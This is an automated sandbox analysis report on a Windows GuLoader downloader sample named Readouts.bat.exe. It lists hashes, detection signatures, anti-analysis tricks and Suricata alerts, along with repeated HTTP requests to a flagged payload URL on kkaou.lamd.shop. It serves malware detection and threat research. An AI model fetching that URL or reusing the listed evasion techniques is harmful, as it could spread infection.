Edit tour

Windows Analysis Report
Readouts.bat.exe

Overview

General Information

Sample name:	Readouts.bat.exe
Analysis ID:	1562049
MD5:	492707a5e753b9c5faa6a9829e065775
SHA1:	7a48c9ae447780551a9714b5cccde57f16094e01
SHA256:	8a0a6bad685a0e4517d2f1e8f70fff1195c78470e467255dfeb1c3f7ec922514
Tags:	batexeuser-abuse_ch
Infos:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Readouts.bat.exe (PID: 6304 cmdline: "C:\Users\user\Desktop\Readouts.bat.exe" MD5: 492707A5E753B9C5FAA6A9829E065775)

Readouts.bat.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\Readouts.bat.exe" MD5: 492707A5E753B9C5FAA6A9829E065775)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2169579435.0000000005D35000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.3529994044.0000000002115000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T07:16:38.511353+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:16:49.173667+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:16:59.573665+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:09.980013+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:20.386353+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:30.996054+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:41.401856+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:52.013444+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:02.420488+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:12.827458+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:23.432703+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:34.042247+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:44.448641+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	172.93.121.126	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kkaou.lamd.shop/ts.binmswsock.dll.mui(M&L	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.bin-2476756634-1002	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.bino	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binL	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binN	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binj	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.bin)	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binQ	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.bin	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binmd.shop/ts.bin	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binwshqos.dll.muin%	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binx	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binf	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.bin%	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binwshqos.dll.mui	Avira URL Cloud: Label: malware
Source: http://kkaou.lamd.shop/ts.binA	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Readouts.bat.exe	ReversingLabs: Detection: 13%
Source: Readouts.bat.exe	Virustotal: Detection: 20%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Readouts.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Readouts.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source:	Binary string: mshtml.pdbUGP source: Readouts.bat.exe, 00000004.00000001.2161659320.0000000000649000.00000008.00000001.01000000.00000009.sdmp

Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Readouts.bat.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.93.121.126:80

Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: kkaou.lamd.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:16:24 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:16:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:16:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:16:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:26 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:17:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:18:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:18:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:18:29 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding

Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.bin
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.bin%
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.bin)
Source: Readouts.bat.exe, 00000004.00000002.3531172526.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kkaou.lamd.shop/ts.bin-2476756634-1002
